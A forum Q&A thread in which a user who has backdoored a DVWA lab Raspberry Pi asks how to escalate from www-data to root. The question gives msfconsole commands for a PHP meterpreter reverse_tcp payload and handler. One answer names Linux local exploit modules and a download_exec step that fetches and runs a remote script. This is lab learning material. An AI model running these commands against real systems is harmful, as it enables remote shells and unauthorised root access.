MSFConsole/Kali Linux - gain root access to unix system

Question

I am messing around with Kali Linux, MSFConsole and DVWA (Damn Vulnerable Web Application).

I have successfully been able to get into the system (Raspberry Pi) by creating a PHP backdoor and uploaded it via SQL injection.

Now I have access the system, the only issue is I am running as www-data (wouldn't it be nice to become root to create your own super user account?!) Is it possible to somehow privilege escalate in Linux (Raspbaian) by using MSFConsole, BASH (from the backdoor) or another way?

I have tried to run "use priv" in the meterpreter prompt but the error I get is 'Failed to load extension: No module of the name ext_server_priv.php found'. If it helps I am running the reverse_tcp exploit as a PHP script.

I was able to compromise the system by running this is Msfconsole

use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit

I then uploaded hackme.php to the web server via the insecure file upload, after I done that I then browsed to the uploaded file.

Credit goes to this video for giving me the above code. (I had to use the generate function instead of msfpayload because that functionality has been moved due to it being deprecated.)

Answer 1

At this point you've achieved the basics of a compromise on the system and you're on to the common phase two of exploitation which is privilege escalation.

Exactly how you can achieve that depends very much on the system in question, what code is installed on it and how it's configured. Some options for things to look for to get privilege escalation on a linux system

• SetUID root binaries that are writable by the user you are running as. if you can find something you can overwrite which, when executed, will run as root, you can use this to escalate your privileges.
• Vulnerabilities in system services running as root. This will likely depend on the patch status of the system that you're running on.

Other things which apply more in "real-world" security tests but which are unlikely to apply to your situation

• Credentials exposed in files on the system. This can be a common way to exploit systems.
• Password guessing attacks. Guessing credentials is a good way to gain additional access
• Pivoting from your attacked system to another one in the same network. Typically once an attacker has a foothold in a network they will scan for other systems which may have additional mid-configurations that could be exploited.

Answer 2

According to metasploit documentation, user priv is a module alvailable to the native Windows meterpreter only (not other meterpreters).

You probably want to look into unix privilege escalation, which i do not know about. I do not believe there's an automated module for metasploit that would do that...

Good luck ;)

Answer 3

You can upgrade your shell to a Meterpreter with sessions -u <#> and then run post modules (e.g., post/multi/recon/local_exploit_suggester) or you can also take an existing session (Meterpreter or not) and run a local privilege escalation exploit, e.g., udev_netlink, sock_sendpage, et al, by setting the SESSION variable.

Some modules vary by OS or scenario, some are just difficult to find in the metasploit-framework hierarchy. Try the following from within meterpreter:

show post

run post/multi/<tab><tab>

run post/linux/<tab><tab>

run exploit/multi/<tab><tab>

You can also run a variety of privilege-escalation tools outside of the metasploit-framework and launch them into your session. Here are two modules which aid in this endeavor:

use post/multi/gather/multi_command

set RESOURCE cmds.rc

use post/linux/manage/download_exec

set URL http://10.0.0.1/cmds.sh

I suggest that you prepare a system in a lab that matches the qualities of your target system, e.g., same OS, patchlevel, installables, configuration settings, et al. By maintaining root access on this mocked-up lab target, you can recreate what you will attempt to do to the real target. A lot of privilege-escalation tools require root access in order to run them properly, e.g., Nessus and OpenVAS in credentialed mode, CIS-CAT, ovaldi, cvechecker, lynis, unix-privesc-check, and enum4linux are all great tools in this space. Others will have to be run only on the real target system, such as sucrack or phrasendrescher. Some privilege escalation attacks require significantly more planning, such as exploitation of custom setuid/setgid binaries. The RPi will likely require a cross compiler for exploits, and many may not even work unless you change offsets to work with the registers, opcodes, and endianness of the ARM platform.